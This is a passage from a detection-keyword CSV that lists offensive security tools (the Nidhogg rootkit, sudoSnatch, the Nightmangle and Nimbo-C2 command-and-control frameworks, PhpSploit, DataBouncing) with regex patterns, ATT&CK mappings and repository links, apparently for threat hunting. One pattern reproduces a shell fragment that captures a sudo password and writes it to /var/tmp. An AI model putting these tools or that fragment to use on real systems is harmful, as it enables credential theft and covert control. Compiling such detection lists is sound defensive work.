- TA0004 - TA0006 - TA0009 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/Idov31/Nidhogg","1","0","#content","N/A","10","10","1946","284","2025-04-19T14:28:47Z","2022-05-29T14:37:50Z","53368" "*Nidhogg::RegistryUtils::NidhoggRegistryHideKey*",".{0,1000}Nidhogg\:\:RegistryUtils\:\:NidhoggRegistryHideKey.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/Idov31/Nidhogg","1","0","#content","N/A","10","10","1946","284","2025-04-19T14:28:47Z","2022-05-29T14:37:50Z","53369" "*Nidhogg::RegistryUtils::NidhoggRegistryHideValue*",".{0,1000}Nidhogg\:\:RegistryUtils\:\:NidhoggRegistryHideValue.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - 
T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/Idov31/Nidhogg","1","0","#content","N/A","10","10","1946","284","2025-04-19T14:28:47Z","2022-05-29T14:37:50Z","53370" "*Nidhogg::RegistryUtils::NidhoggRegistryProtectKey*",".{0,1000}Nidhogg\:\:RegistryUtils\:\:NidhoggRegistryProtectKey.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/Idov31/Nidhogg","1","0","#content","N/A","10","10","1946","284","2025-04-19T14:28:47Z","2022-05-29T14:37:50Z","53371" "*Nidhogg::RegistryUtils::NidhoggRegistryProtectValue*",".{0,1000}Nidhogg\:\:RegistryUtils\:\:NidhoggRegistryProtectValue.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 
- T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/Idov31/Nidhogg","1","0","#content","N/A","10","10","1946","284","2025-04-19T14:28:47Z","2022-05-29T14:37:50Z","53372" "*Nidhogg::RegistryUtils::NidhoggRegistryQueryHiddenKeys*",".{0,1000}Nidhogg\:\:RegistryUtils\:\:NidhoggRegistryQueryHiddenKeys.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/Idov31/Nidhogg","1","0","#content","N/A","10","10","1946","284","2025-04-19T14:28:47Z","2022-05-29T14:37:50Z","53373" "*Nidhogg::RegistryUtils::NidhoggRegistryQueryHiddenValues*",".{0,1000}Nidhogg\:\:RegistryUtils\:\:NidhoggRegistryQueryHiddenValues.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an 
all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/Idov31/Nidhogg","1","0","#content","N/A","10","10","1946","284","2025-04-19T14:28:47Z","2022-05-29T14:37:50Z","53374" "*Nidhogg::RegistryUtils::NidhoggRegistryQueryProtectedKeys*",".{0,1000}Nidhogg\:\:RegistryUtils\:\:NidhoggRegistryQueryProtectedKeys.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","Black Basta","Exploitation 
tool","https://github.com/Idov31/Nidhogg","1","0","#content","N/A","10","10","1946","284","2025-04-19T14:28:47Z","2022-05-29T14:37:50Z","53375" "*Nidhogg::RegistryUtils::NidhoggRegistryQueryProtectedValues*",".{0,1000}Nidhogg\:\:RegistryUtils\:\:NidhoggRegistryQueryProtectedValues.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/Idov31/Nidhogg","1","0","#content","N/A","10","10","1946","284","2025-04-19T14:28:47Z","2022-05-29T14:37:50Z","53376" "*Nidhogg::RegistryUtils::NidhoggRegistryUnhideKey*",".{0,1000}Nidhogg\:\:RegistryUtils\:\:NidhoggRegistryUnhideKey.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - 
T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/Idov31/Nidhogg","1","0","#content","N/A","10","10","1946","284","2025-04-19T14:28:47Z","2022-05-29T14:37:50Z","53377" "*Nidhogg::RegistryUtils::NidhoggRegistryUnhideValue*",".{0,1000}Nidhogg\:\:RegistryUtils\:\:NidhoggRegistryUnhideValue.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/Idov31/Nidhogg","1","0","#content","N/A","10","10","1946","284","2025-04-19T14:28:47Z","2022-05-29T14:37:50Z","53378" "*Nidhogg::RegistryUtils::NidhoggRegistryUnprotectValue*",".{0,1000}Nidhogg\:\:RegistryUtils\:\:NidhoggRegistryUnprotectValue.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - 
T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/Idov31/Nidhogg","1","0","#content","N/A","10","10","1946","284","2025-04-19T14:28:47Z","2022-05-29T14:37:50Z","53379" "*Nidhogg-0.1.zip*",".{0,1000}Nidhogg\-0\.1\.zip.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/Idov31/Nidhogg","1","1","N/A","N/A","10","10","1946","284","2025-04-19T14:28:47Z","2022-05-29T14:37:50Z","53380" "*Nidhogg-0.2.zip*",".{0,1000}Nidhogg\-0\.2\.zip.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - 
T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/Idov31/Nidhogg","1","1","N/A","N/A","10","10","1946","284","2025-04-19T14:28:47Z","2022-05-29T14:37:50Z","53381" "*Nidhogg-0.3.zip*",".{0,1000}Nidhogg\-0\.3\.zip.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/Idov31/Nidhogg","1","1","N/A","N/A","10","10","1946","284","2025-04-19T14:28:47Z","2022-05-29T14:37:50Z","53382" "*Nidhogg-0.4.zip*",".{0,1000}Nidhogg\-0\.4\.zip.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - 
T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/Idov31/Nidhogg","1","1","N/A","N/A","10","10","1946","284","2025-04-19T14:28:47Z","2022-05-29T14:37:50Z","53383" "*Nidhogg-0.5.zip*",".{0,1000}Nidhogg\-0\.5\.zip.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/Idov31/Nidhogg","1","1","N/A","N/A","10","10","1946","284","2025-04-19T14:28:47Z","2022-05-29T14:37:50Z","53384" "*NidhoggClient.exe *",".{0,1000}NidhoggClient\.exe\s.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red 
teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/Idov31/Nidhogg","1","0","N/A","N/A","10","10","1946","284","2025-04-19T14:28:47Z","2022-05-29T14:37:50Z","53385" "*NidhoggExample.cpp*",".{0,1000}NidhoggExample\.cpp.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/Idov31/Nidhogg","1","0","N/A","N/A","10","10","1946","284","2025-04-19T14:28:47Z","2022-05-29T14:37:50Z","53386" 
"*Nidhogg-master*",".{0,1000}Nidhogg\-master.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/Idov31/Nidhogg","1","1","N/A","N/A","10","10","1946","284","2025-04-19T14:28:47Z","2022-05-29T14:37:50Z","53387" "*nIFS=* read -s pass\necho -e *User=*$(whoami)*Password=*$pass*> /var/tmp*",".{0,1000}nIFS\=.{0,1000}\sread\s\-s\spass\\necho\s\-e\s.{0,1000}User\=.{0,1000}\$\(whoami\).{0,1000}Password\=.{0,1000}\$pass.{0,1000}\>\s\/var\/tmp.{0,1000}","offensive_tool_keyword","sudoSnatch","sudoSnatch payload grabs sudo password in plain text and imediately after target uses sudo command and sends it back to attacker remotely/locally.","T1552.001 - T1056.001 - T1071.001","TA0006 - TA0004 - TA0010","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/SudoSnatch","1","0","#linux","N/A","10","10","904","310","2024-09-14T02:34:26Z","2021-09-08T20:33:18Z","53388" "*nightCrawler.ps1 *",".{0,1000}nightCrawler\.ps1\s.{0,1000}","offensive_tool_keyword","DataBouncing","Data Bouncing is a technique for transmitting data between two endpoints using DNS lookups and HTTP header manipulation","T1048 - 
T1041","TA0010","N/A","N/A","Data Exfiltration","https://github.com/Unit-259/DataBouncing","1","0","N/A","N/A","9","1","15","0","2025-03-12T07:34:04Z","2025-03-12T06:58:51Z","53389" "*Nightmangle-master*",".{0,1000}Nightmangle\-master.{0,1000}","offensive_tool_keyword","Nightmangle","Nightmangle is post-exploitation Telegram Command and Control (C2/C&C) Agent","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/1N73LL1G3NC3x/Nightmangle","1","1","N/A","N/A","10","10","156","19","2023-09-26T19:21:31Z","2023-09-26T18:25:23Z","53390" "*nikto -C all *",".{0,1000}nikto\s\-C\sall\s.{0,1000}","offensive_tool_keyword","nikto","Nikto web server scanner","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/sullo/nikto","1","0","#linux","N/A","N/A","10","9184","1306","2025-02-22T14:30:28Z","2012-11-24T04:24:29Z","53391" "*nikto/program*",".{0,1000}nikto\/program.{0,1000}","offensive_tool_keyword","nikto","Nikto web server scanner","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/sullo/nikto","1","1","#linux","N/A","N/A","10","9184","1306","2025-02-22T14:30:28Z","2012-11-24T04:24:29Z","53392" "*nil0x42/phpsploit*",".{0,1000}nil0x42\/phpsploit.{0,1000}","offensive_tool_keyword","PhpSploit","Full-featured C2 framework which silently persists on webserver via evil PHP oneliner","T1505.003 - T1505 - T1059 - T1219 - T1547","TA0003 - TA0011 - TA0005","N/A","N/A","C2","https://github.com/nil0x42/phpsploit","1","1","N/A","N/A","10","10","2331","453","2024-05-06T13:49:14Z","2014-05-21T19:43:03Z","53393" "*NimBlackout*.exe*",".{0,1000}NimBlackout.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","ThreatCheck","Identifies the bytes that Microsoft Defender / AMSI Consumer flags on","T1059.001 - T1059.005 - T1027.002 - T1070.004","TA0002 - TA0005 - TA0040","N/A","N/A","Defense 
Evasion","https://github.com/rasta-mouse/ThreatCheck","1","0","N/A","N/A","10","10","1185","143","2024-06-01T16:46:57Z","2020-10-08T11:22:26Z","53394" "*NimBlackout.*",".{0,1000}NimBlackout\..{0,1000}","offensive_tool_keyword","ThreatCheck","Identifies the bytes that Microsoft Defender / AMSI Consumer flags on","T1059.001 - T1059.005 - T1027.002 - T1070.004","TA0002 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/ThreatCheck","1","0","N/A","N/A","10","10","1185","143","2024-06-01T16:46:57Z","2020-10-08T11:22:26Z","53395" "*NimBlackout-main*",".{0,1000}NimBlackout\-main.{0,1000}","offensive_tool_keyword","ThreatCheck","Identifies the bytes that Microsoft Defender / AMSI Consumer flags on","T1059.001 - T1059.005 - T1027.002 - T1070.004","TA0002 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/ThreatCheck","1","0","N/A","N/A","10","10","1185","143","2024-06-01T16:46:57Z","2020-10-08T11:22:26Z","53396" "*nimbo_main*",".{0,1000}nimbo_main.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","N/A","10","10","392","48","2024-10-20T10:44:20Z","2022-10-08T19:02:58Z","53397" "*nimbo_prompt_color*",".{0,1000}nimbo_prompt_color.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","N/A","10","10","392","48","2024-10-20T10:44:20Z","2022-10-08T19:02:58Z","53398" 
